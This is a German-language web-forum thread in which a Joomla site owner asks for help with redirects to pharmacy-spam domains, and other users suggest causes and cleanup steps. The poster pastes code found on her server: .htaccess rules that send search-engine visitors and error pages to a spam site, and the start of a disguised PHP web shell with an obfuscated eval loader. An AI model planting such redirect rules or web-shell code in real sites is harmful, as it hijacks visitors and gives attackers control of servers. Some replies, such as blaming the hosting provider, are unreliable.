Hallo,
ich habe mit Joomla eine Webseite erstellt. Seit kurzem wird man beim anklicken eines Links auf dre Seite oder beim anklicken der Seite über google immer auf www.drugsbrow.com weitergeleitet. wie kriege ich das wieder weg??? Und woher kommt das überhaupt? Und wie kann ich sowas evtl vermeiden?
Hoffe mir kann jemand helfen.
LG Uschi
Mit den Feinheiten von Joomla kenne ich mich nicht so gut aus, ich arbeite mehr mit Wordpress als mit Joomla. Trotzdem einige mögliche Gründe: Hast du in letzter Zeit, bzw. kurz bevor dir diese Weiterleitung auffiel unseriöse Plugins, Templates oder ähnliches installiert? Ansonsten wäre es vielleicht nicht schlecht, wenn du mal die Adresse deiner Webseite nennst, oder nach was man bei Google suchen muss um die Seite zu finden, damit ich mir das selbst mal ansehen kann. Viele Grüße, Max
Hallo,
hier wäre es vielleicht erst einmal interessant zu erfahren, wie denn die URL deiner Seite lautet um dies evt. nachvollziehen zu können.
Gruß Remigton
Ach ja, natürlich, sorry Ihr beiden:
http://www.arnstadt-geschenke.de/
Wenn man bei google nach „arnstadt geschenke“ sucht kommt der Link gleich als erstes…
LG Uschi
Hallo,
nein eigentlich nicht. Hab bisher nur ein Google-Maps Plugin runtergeladen. Aber von der Joomla Seite…
Ich kann leider auch nicht sagen ob der Fehler direkt danach aufgetreten ist. Mir ist es erst vor kurzem aufgefallen, als ich die Suche testen wollte.
LG Uschi
Ergänzung:
Ich hab da auch schon etwas entdeckt - in der .htaccess stand sowas:
RewriteCond %{HTTP\_REFERER} .\*google.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*ask.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*yahoo.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*baidu.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*youtube.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*wikipedia.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*qq.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*excite.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*msn.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*netscape.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*aol.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*hotbot.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*goto.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*mamma.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*alltheweb.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*lycos.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*search.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*metacrawler.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*bing.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*dogpile.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*facebook.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*twitter.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*blog.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*live.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*myspace.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*linkedin.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*altavista.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*infoseek.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*yandex.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*rambler.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*mail.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*ya.\*$ [NC]
RewriteRule .\* http://medicquil.ru [R,L]
ErrorDocument 401 http://medicquil.ru
ErrorDocument 403 http://medicquil.ru
ErrorDocument 404 http://medicquil.ru
ErrorDocument 500 http://medicquil.ru
Das hab ich dann rausgelöscht. Und ein paar Stunden später stand wieder sowas drinn…
Hat die Datei forloadsh.php vielleciht etwas damit zu tun?
?php
//example: http://domain.com/forload.php?test
set\_time\_limit(0); //ñíèìàåì ëèìèò âðåìåíè âûïîëíåíèÿ ñêðèïòà
if (isset($\_GET['test']))
{
echo "s9d8f78ds97f";
}
?GIF89af
?php # Web Shell by oRb
$auth\_pass = "";
$color = "#df5";
$default\_action = 'FilesMan';
$default\_use\_ajax = true;
$default\_charset = 'Windows-1251';
preg\_replace("/.\*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7X1re9s2z/Dn9VcwmjfZq+PYTtu7s2MnaQ5t2jTpcugp6ePJsmxrkS1PkuNkWf77C4CkREqy43S738N1vbufp7FIEARJkARBAHT7xRVnNIlui4XO6d7Jx72TC/PN2dmHzjl8dbZf7x2dmd9KJXbHCtPQCbYHzjgKWYtZQWDdFo3Xvj/[das ging noch ewig so weiter,hab ich mal entfernt]",".");?
Das ist nicht Jommla weil Jomla ist frei von Werbung.
Das kann meiner Meinung nach nur der Provider sein.
Ist der Kostenlos? Weil gerade die machen sowas.
Wenn du z.B. bei Strato oder 1&1 einen Account hast ist das nicht?
Also wo und welcher Provider ist dein Webseite.
Oder bei dem Provider fragen wo man das abstellen kann in deinem Profil/Konto ect.
Ich hoffe ich konnte helfen.!!
Hallo,
danke für deine Antwort. Ich bin bei Greatnet, ein kostenpflichtiger Anbieter.
Ich werde mal nachfragen ob sie das abschalten können…
LG
Hallo
Das ganze wird in der Datenbank oder im Template stehen. Ist die neueste Version von Joomla installiert
was für Komponenten sind installiert sind die auch upgedatet worden. Es gibt eine Menge Sachen die kontrolliert werden müssen. Passwort Logfiles sind die Rechte richtig gesetzt usw.
Wurde ein eigenes Template genommen oder ein kostenloses.
Hier eine Ferndiagnose zu erstellen ist unmöglich.
Ich würde die Logfiles anschauen um zu schauen ob jemand fremdes an den Dateien war.
Gruß
Carmen
Hallo Uschi,
geben Sie mir doch einmal die Adresse Ihrer Internetseite. Dann kann ich gerne schauen, an welcher Stelle die Weiterleitung eingefügt ist und ob Ihre Webseite evtl. mit Schadcode (sog. Malware) infiziert ist.
union-web [web]services
http://www.union-web.de
Hallo,
im access-log von meinem homefile (noch über dem joomla ordner) ist so ein eintrag:
62.80.124.140 - - [18/Jul/2012:10:35:02 +0200] „GET / HTTP/1.1“ 200 9044 „http://www.forumseek.net“ „Mozilla/5.0 (compatible; http://www.forumseek.net/ BOT_2.1; +http://www.forumseek.net))“
klingt verdächtig. aber ist das jetzt ein zugriff auf meine dateien oder nur auf die webseite? also hat da jemand irgendwas ausgelsenen oder richtig geändert?
irgendetwas macht sich ja an der .htaccess zu schaffen…
außer noch ein paar error-logs in dem gleichen ordner finde ich keine weiteren logs.
im joomla-ordner ist zwar ein „logs“-ordner. aber da ist nur eine index.html mit inhalt „“ drinn…
Hallo Uschi,
leeren Sie doch einmal Ihren Browser-Cache. Habe die Webseite überprüft - diese enthält keine malware sondern wird bei mir in Firefox und Chrome korrekt dargestellt.
Beste Grüße,
Steffen
Also diese htacces-Datei scheint in der Tat für die Weiterleitung verantwortlich zu sein.
Die forload.php scheint ebenfalls etwas damit zu tun zu haben. Obwohl ich ein bisschen PHP coden kann, kann ich mit dieser Wortschlange wenig anfangen, in der ja offensichtlich etwas ersetzt wird. Gibt man aber „Web Shell by oRB“, was sich ja auch in dieser Datei befindet mal bei Google (oder Bing) eingibt, erhält man ziemlich viele Ergebnisse, bei denen sich Leute auch wie du über Weiterleitungen beklagen. Mehr als dort zu finden ist kann ich dir leider auch nicht sagen.
Es scheint aber nicht ganz einfach zu sein, diesen Virus zu entfernen, im Joomlaportal wird das komplette Zurücksetzen des Servers empfohlen (http://www.joomlaportal.de/sicherheit-joomla-1-5-und…), hier wird beschrieben wie die Infektion auch ohne Zurücksetzen des Servers behoben werden kann: http://www.webhostingtalk.com/showthread.php?t=972669
Zur Sicherheit solltest du vielleicht auch noch die ganzen Passwörter für den Server ändern (wie z.B. für FTP), wer weiß was da (von Joomla) gespeichert wird und jetzt ausgelesen wurde. Viele Grüße, Max
Hallo,
bei mir wird die Seite normal aufgerufen. Hast du daas Problem inzwischen vielleicht behoben?
Gruß
Remigton
Hallo Steffen,
danke, ich denke ich habe das Problem gelöst. Der fehler ist nicht mehr aufgetreten.
LG Uschi
Hallo Remington,
danke, ich denke ich habe das Problem gelöst. Der Fehler ist nicht mehr aufgetreten.
LG Uschi
Hallo Blankensteiner,
dake für deine Hilfe. Es sieht jetzt ganz gut aus. Bisher sind keine Weiterleitungen wieder aufgetretn.
LG Uschi
Das freut mich zu hören. Alles Gute weiterhin.